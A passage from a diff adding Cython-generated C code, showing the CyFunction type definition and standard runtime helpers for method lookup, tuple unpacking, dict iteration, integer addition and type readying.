offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ + static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* IterFinish */ + static CYTHON_INLINE int __Pyx_IterFinish(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + PyObject* exc_type = __Pyx_PyErr_CurrentExceptionType(); + if (unlikely(exc_type)) { + if (unlikely(!__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) + return -1; + __Pyx_PyErr_Clear(); + return 0; + } + return 0; +} + +/* PyObjectCallNoArg */ + static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { + PyObject *arg = NULL; + return __Pyx_PyObject_FastCall(func, (&arg)+1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectGetMethod */ + static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { + PyObject *attr; +#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP + __Pyx_TypeName type_name; + PyTypeObject *tp = Py_TYPE(obj); + PyObject *descr; + descrgetfunc f = NULL; + PyObject **dictptr, *dict; + int meth_found = 0; + assert (*method == NULL); + if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; + } + if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { + return 0; + } + descr = _PyType_Lookup(tp, name); + if (likely(descr != NULL)) { + Py_INCREF(descr); +#if defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR + if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) +#elif PY_MAJOR_VERSION >= 3 + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) + #endif +#else + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr))) + #endif +#endif + { + meth_found = 1; + } else { + f = Py_TYPE(descr)->tp_descr_get; + if (f != NULL && PyDescr_IsData(descr)) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + } + } + dictptr = _PyObject_GetDictPtr(obj); + if (dictptr != NULL && (dict = *dictptr) != NULL) { + Py_INCREF(dict); + attr = __Pyx_PyDict_GetItemStr(dict, name); + if (attr != NULL) { + Py_INCREF(attr); + Py_DECREF(dict); + Py_XDECREF(descr); + goto try_unpack; + } + Py_DECREF(dict); + } + if (meth_found) { + *method = descr; + return 1; + } + if (f != NULL) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + if (likely(descr != NULL)) { + *method = descr; + return 0; + } + type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return 0; +#else + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; +#endif +try_unpack: +#if CYTHON_UNPACK_METHODS + if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { + PyObject *function = PyMethod_GET_FUNCTION(attr); + Py_INCREF(function); + Py_DECREF(attr); + *method = function; + return 1; + } +#endif + *method = attr; + return 0; +} + +/* PyObjectCallMethod0 */ + static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { + PyObject *method = NULL, *result = NULL; + int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); + if (likely(is_method)) { + result = __Pyx_PyObject_CallOneArg(method, obj); + Py_DECREF(method); + return result; + } + if (unlikely(!method)) goto bad; + result = __Pyx_PyObject_CallNoArg(method); + Py_DECREF(method); +bad: + return result; +} + +/* UnpackItemEndCheck */ + static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected) { + if (unlikely(retval)) { + Py_DECREF(retval); + __Pyx_RaiseTooManyValuesError(expected); + return -1; + } + return __Pyx_IterFinish(); +} + +/* UnpackTupleError */ + static void __Pyx_UnpackTupleError(PyObject *t, Py_ssize_t index) { + if (t == Py_None) { + __Pyx_RaiseNoneNotIterableError(); + } else if (PyTuple_GET_SIZE(t) < index) { + __Pyx_RaiseNeedMoreValuesError(PyTuple_GET_SIZE(t)); + } else { + __Pyx_RaiseTooManyValuesError(index); + } +} + +/* UnpackTuple2 */ + static CYTHON_INLINE int __Pyx_unpack_tuple2_exact( + PyObject* tuple, PyObject** pvalue1, PyObject** pvalue2, int decref_tuple) { + PyObject *value1 = NULL, *value2 = NULL; +#if CYTHON_COMPILING_IN_PYPY + value1 = PySequence_ITEM(tuple, 0); if (unlikely(!value1)) goto bad; + value2 = PySequence_ITEM(tuple, 1); if (unlikely(!value2)) goto bad; +#else + value1 = PyTuple_GET_ITEM(tuple, 0); Py_INCREF(value1); + value2 = PyTuple_GET_ITEM(tuple, 1); Py_INCREF(value2); +#endif + if (decref_tuple) { + Py_DECREF(tuple); + } + *pvalue1 = value1; + *pvalue2 = value2; + return 0; +#if CYTHON_COMPILING_IN_PYPY +bad: + Py_XDECREF(value1); + Py_XDECREF(value2); + if (decref_tuple) { Py_XDECREF(tuple); } + return -1; +#endif +} +static int __Pyx_unpack_tuple2_generic(PyObject* tuple, PyObject** pvalue1, PyObject** pvalue2, + int has_known_size, int decref_tuple) { + Py_ssize_t index; + PyObject *value1 = NULL, *value2 = NULL, *iter = NULL; + iternextfunc iternext; + iter = PyObject_GetIter(tuple); + if (unlikely(!iter)) goto bad; + if (decref_tuple) { Py_DECREF(tuple); tuple = NULL; } + iternext = __Pyx_PyObject_GetIterNextFunc(iter); + value1 = iternext(iter); if (unlikely(!value1)) { index = 0; goto unpacking_failed; } + value2 = iternext(iter); if (unlikely(!value2)) { index = 1; goto unpacking_failed; } + if (!has_known_size && unlikely(__Pyx_IternextUnpackEndCheck(iternext(iter), 2))) goto bad; + Py_DECREF(iter); + *pvalue1 = value1; + *pvalue2 = value2; + return 0; +unpacking_failed: + if (!has_known_size && __Pyx_IterFinish() == 0) + __Pyx_RaiseNeedMoreValuesError(index); +bad: + Py_XDECREF(iter); + Py_XDECREF(value1); + Py_XDECREF(value2); + if (decref_tuple) { Py_XDECREF(tuple); } + return -1; +} + +/* dict_iter */ + static CYTHON_INLINE PyObject* __Pyx_dict_iterator(PyObject* iterable, int is_dict, PyObject* method_name, + Py_ssize_t* p_orig_length, int* p_source_is_dict) { + is_dict = is_dict || likely(PyDict_CheckExact(iterable)); + *p_source_is_dict = is_dict; + if (is_dict) { +#if !CYTHON_COMPILING_IN_PYPY + *p_orig_length = PyDict_Size(iterable); + Py_INCREF(iterable); + return iterable; +#elif PY_MAJOR_VERSION >= 3 + static PyObject *py_items = NULL, *py_keys = NULL, *py_values = NULL; + PyObject **pp = NULL; + if (method_name) { + const char *name = PyUnicode_AsUTF8(method_name); + if (strcmp(name, "iteritems") == 0) pp = &py_items; + else if (strcmp(name, "iterkeys") == 0) pp = &py_keys; + else if (strcmp(name, "itervalues") == 0) pp = &py_values; + if (pp) { + if (!*pp) { + *pp = PyUnicode_FromString(name + 4); + if (!*pp) + return NULL; + } + method_name = *pp; + } + } +#endif + } + *p_orig_length = 0; + if (method_name) { + PyObject* iter; + iterable = __Pyx_PyObject_CallMethod0(iterable, method_name); + if (!iterable) + return NULL; +#if !CYTHON_COMPILING_IN_PYPY + if (PyTuple_CheckExact(iterable) || PyList_CheckExact(iterable)) + return iterable; +#endif + iter = PyObject_GetIter(iterable); + Py_DECREF(iterable); + return iter; + } + return PyObject_GetIter(iterable); +} +static CYTHON_INLINE int __Pyx_dict_iter_next( + PyObject* iter_obj, CYTHON_NCP_UNUSED Py_ssize_t orig_length, CYTHON_NCP_UNUSED Py_ssize_t* ppos, + PyObject** pkey, PyObject** pvalue, PyObject** pitem, int source_is_dict) { + PyObject* next_item; +#if !CYTHON_COMPILING_IN_PYPY + if (source_is_dict) { + PyObject *key, *value; + if (unlikely(orig_length != PyDict_Size(iter_obj))) { + PyErr_SetString(PyExc_RuntimeError, "dictionary changed size during iteration"); + return -1; + } + if (unlikely(!PyDict_Next(iter_obj, ppos, &key, &value))) { + return 0; + } + if (pitem) { + PyObject* tuple = PyTuple_New(2); + if (unlikely(!tuple)) { + return -1; + } + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(tuple, 0, key); + PyTuple_SET_ITEM(tuple, 1, value); + *pitem = tuple; + } else { + if (pkey) { + Py_INCREF(key); + *pkey = key; + } + if (pvalue) { + Py_INCREF(value); + *pvalue = value; + } + } + return 1; + } else if (PyTuple_CheckExact(iter_obj)) { + Py_ssize_t pos = *ppos; + if (unlikely(pos >= PyTuple_GET_SIZE(iter_obj))) return 0; + *ppos = pos + 1; + next_item = PyTuple_GET_ITEM(iter_obj, pos); + Py_INCREF(next_item); + } else if (PyList_CheckExact(iter_obj)) { + Py_ssize_t pos = *ppos; + if (unlikely(pos >= PyList_GET_SIZE(iter_obj))) return 0; + *ppos = pos + 1; + next_item = PyList_GET_ITEM(iter_obj, pos); + Py_INCREF(next_item); + } else +#endif + { + next_item = PyIter_Next(iter_obj); + if (unlikely(!next_item)) { + return __Pyx_IterFinish(); + } + } + if (pitem) { + *pitem = next_item; + } else if (pkey && pvalue) { + if (__Pyx_unpack_tuple2(next_item, pkey, pvalue, source_is_dict, source_is_dict, 1)) + return -1; + } else if (pkey) { + *pkey = next_item; + } else { + *pvalue = next_item; + } + return 1; +} + +/* PyIntBinop */ + #if !CYTHON_COMPILING_IN_PYPY +static PyObject* __Pyx_PyInt_AddObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check) { + CYTHON_MAYBE_UNUSED_VAR(intval); + CYTHON_MAYBE_UNUSED_VAR(inplace); + CYTHON_UNUSED_VAR(zerodivision_check); + #if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(op1))) { + const long b = intval; + long x; + long a = PyInt_AS_LONG(op1); + + x = (long)((unsigned long)a + (unsigned long)b); + if (likely((x^a) >= 0 || (x^b) >= 0)) + return PyInt_FromLong(x); + return PyLong_Type.tp_as_number->nb_add(op1, op2); + } + #endif + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(PyLong_CheckExact(op1))) { + const long b = intval; + long a, x; +#ifdef HAVE_LONG_LONG + const PY_LONG_LONG llb = intval; + PY_LONG_LONG lla, llx; +#endif + if (unlikely(__Pyx_PyLong_IsZero(op1))) { + return __Pyx_NewRef(op2); + } + if (likely(__Pyx_PyLong_IsCompact(op1))) { + a = __Pyx_PyLong_CompactValue(op1); + } else { + const digit* digits = __Pyx_PyLong_Digits(op1); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op1); + switch (size) { + case -2: + if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { + a = -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { + lla = -(PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + case 2: + if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { + a = (long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { + lla = (PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + case -3: + if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { + a = -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { + lla = -(PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + case 3: + if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { + a = (long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { + lla = (PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + case -4: + if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { + a = -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { + lla = -(PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + case 4: + if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { + a = (long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { + lla = (PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + default: return PyLong_Type.tp_as_number->nb_add(op1, op2); + } + } + x = a + b; + return PyLong_FromLong(x); +#ifdef HAVE_LONG_LONG + long_long: + llx = lla + llb; + return PyLong_FromLongLong(llx); +#endif + + + } + #endif + if (PyFloat_CheckExact(op1)) { + const long b = intval; +#if CYTHON_COMPILING_IN_LIMITED_API + double a = __pyx_PyFloat_AsDouble(op1); +#else + double a = PyFloat_AS_DOUBLE(op1); +#endif + double result; + + PyFPE_START_PROTECT("add", return NULL) + result = ((double)a) + (double)b; + PyFPE_END_PROTECT(result) + return PyFloat_FromDouble(result); + } + return (inplace ? PyNumber_InPlaceAdd : PyNumber_Add)(op1, op2); +} +#endif + +/* BufferIndexError */ + static void __Pyx_RaiseBufferIndexError(int axis) { + PyErr_Format(PyExc_IndexError, + "Out of bounds on buffer access (axis %d)", axis); +} + +/* PyUnicode_Unicode */ + static CYTHON_INLINE PyObject* __Pyx_PyUnicode_Unicode(PyObject *obj) { + if (unlikely(obj == Py_None)) + obj = __pyx_kp_u_None; + return __Pyx_NewRef(obj); +} + +/* PyObject_GenericGetAttrNoDict */ + #if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { + __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, attr_name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(attr_name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { + PyObject *descr; + PyTypeObject *tp = Py_TYPE(obj); + if (unlikely(!PyString_Check(attr_name))) { + return PyObject_GenericGetAttr(obj, attr_name); + } + assert(!tp->tp_dictoffset); + descr = _PyType_Lookup(tp, attr_name); + if (unlikely(!descr)) { + return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); + } + Py_INCREF(descr); + #if PY_MAJOR_VERSION < 3 + if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) + #endif + { + descrgetfunc f = Py_TYPE(descr)->tp_descr_get; + if (unlikely(f)) { + PyObject *res = f(descr, obj, (PyObject *)tp); + Py_DECREF(descr); + return res; + } + } + return descr; +} +#endif + +/* PyObject_GenericGetAttr */ + #if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name) { + if (unlikely(Py_TYPE(obj)->tp_dictoffset)) { + return PyObject_GenericGetAttr(obj, attr_name); + } + return __Pyx_PyObject_GenericGetAttrNoDict(obj, attr_name); +} +#endif + +/* ValidateBasesTuple */ + #if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { + Py_ssize_t i, n = PyTuple_GET_SIZE(bases); + for (i = 1; i < n; i++) + { + PyObject *b0 = PyTuple_GET_ITEM(bases, i); + PyTypeObject *b; +#if PY_MAJOR_VERSION < 3 + if (PyClass_Check(b0)) + { + PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", + PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); + return -1; + } +#endif + b = (PyTypeObject*) b0; + if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + if (dictoffset == 0 && b->tp_dictoffset) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "extension type '%.200s' has no __dict__ slot, " + "but base type '" __Pyx_FMT_TYPENAME "' has: " + "either add 'cdef dict __dict__' to the extension type " + "or add '__slots__ = [...]' to the base type", + type_name, b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + } + return 0; +} +#endif + +/* PyType_Ready */ + static int __Pyx_PyType_Ready(PyTypeObject *t) { +#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) + (void)__Pyx_PyObject_CallMethod0; +#if CYTHON_USE_TYPE_SPECS + (void)__Pyx_validate_bases_tuple; +#endif + return PyType_Ready(t); +#else + int r; + PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); + if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) + return -1; +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + { + int gc_was_enabled; + #if PY_VERSION_HEX >= 0x030A00b1 + gc_was_enabled = PyGC_Disable(); + (void)__Pyx_PyObject_CallMethod0; + #else + PyObject *ret, *py_status; + PyObject *gc = NULL; + #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) + gc = PyImport_GetModule(__pyx_kp_u_gc); + #endif + if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); + if (unlikely(!gc)) return -1; + py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); + if (unlikely(!py_status)) { + Py_DECREF(gc); + return -1; + } + gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); + Py_DECREF(py_status); + if (gc_was_enabled > 0) { + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); + if (unlikely(!ret)) { + Py_DECREF(gc); + return -1; + } + Py_DECREF(ret); + } else if (unlikely(gc_was_enabled == -1)) { + Py_DECREF(gc); + return -1; + } + #endif + t->tp_flags |= Py_TPFLAGS_HEAPTYPE; +#if PY_VERSION_HEX >= 0x030A0000 + t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; +#endif +#else + (void)__Pyx_PyObject_CallMethod0; +#endif + r = PyType_Ready(t); +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; + #if PY_VERSION_HEX >= 0x030A00b1 + if (gc_was_enabled) + PyGC_Enable(); + #else + if (gc_was_enabled) { + PyObject *tp, *v, *tb; + PyErr_Fetch(&tp, &v, &tb); + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); + if (likely(ret || r == -1)) { + Py_XDECREF(ret); + PyErr_Restore(tp, v, tb); + } else { + Py_XDECREF(tp); + Py_XDECREF(v); + Py_XDECREF(tb); + r = -1; + } + } + Py_DECREF(gc); + #endif + } +#endif + return r; +#endif +} + +/* SetupReduce */ + #if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce_is_named(PyObject* meth, PyObject* name) { + int ret; + PyObject *name_attr; + name_attr = __Pyx_PyObject_GetAttrStrNoError(meth, __pyx_n_s_name_2); + if (likely(name_attr)) { + ret = PyObject_RichCompareBool(name_attr, name, Py_EQ); + } else { + ret = -1; + } + if (unlikely(ret < 0)) { + PyErr_Clear(); + ret = 0; + } + Py_XDECREF(name_attr); + return ret; +} +static int __Pyx_setup_reduce(PyObject* type_obj) { + int ret = 0; + PyObject *object_reduce = NULL; + PyObject *object_getstate = NULL; + PyObject *object_reduce_ex = NULL; + PyObject *reduce = NULL; + PyObject *reduce_ex = NULL; + PyObject *reduce_cython = NULL; + PyObject *setstate = NULL; + PyObject *setstate_cython = NULL; + PyObject *getstate = NULL; +#if CYTHON_USE_PYTYPE_LOOKUP + getstate = _PyType_Lookup((PyTypeObject*)type_obj, __pyx_n_s_getstate); +#else + getstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_getstate); + if (!getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (getstate) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_getstate = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_getstate); +#else + object_getstate = __Pyx_PyObject_GetAttrStrNoError((PyObject*)&PyBaseObject_Type, __pyx_n_s_getstate); + if (!object_getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (object_getstate != getstate) { + goto __PYX_GOOD; + } + } +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce_ex = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#else + object_reduce_ex = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#endif + reduce_ex = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce_ex); if (unlikely(!reduce_ex)) goto __PYX_BAD; + if (reduce_ex == object_reduce_ex) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#else + object_reduce = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#endif + reduce = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce); if (unlikely(!reduce)) goto __PYX_BAD; + if (reduce == object_reduce || __Pyx_setup_reduce_is_named(reduce, __pyx_n_s_reduce_cython)) { + reduce_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_reduce_cython); + if (likely(reduce_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce, reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (reduce == object_reduce || PyErr_Occurred()) { + goto __PYX_BAD; + } + setstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate); + if (!setstate) PyErr_Clear(); + if (!setstate || __Pyx_setup_reduce_is_named(setstate, __pyx_n_s_setstate_cython)) { + setstate_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate_cython); + if (likely(setstate_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate, setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if 